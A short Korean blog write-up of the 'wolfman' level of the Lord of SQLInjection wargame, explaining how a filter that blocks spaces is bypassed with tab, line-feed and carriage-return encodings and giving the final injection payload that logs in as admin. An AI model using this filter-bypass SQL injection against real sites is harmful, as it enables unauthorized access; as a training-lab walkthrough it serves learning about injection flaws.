Web/LOS

[LOS] 문제 5. wolfman, 스페이스(빈칸) 우회 기법 이용

__bo0o_ 2018. 10. 26. 19:19


 

?pw=1 or id=%27admin%27

No whitespace가 뜨며 해결되지 않는다.

 

if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~");

preg_match 함수를 살펴보면

pw에 띄어쓰기가 사용 불가능하고,

띄어쓰기의 URL 인코딩 값인 %20 역시 사용 불가능하다.

 

빈칸을 우회하는 방법은 은 여러 가지가 있다고 한다.

빈칸을 우회하는 방법은

Tab : %09

Line Feed(\n) : %0a

Carrage Return(\r) : %0d

등등.

 

따라서 답은 ?pw=%27%09or%09id=%27admin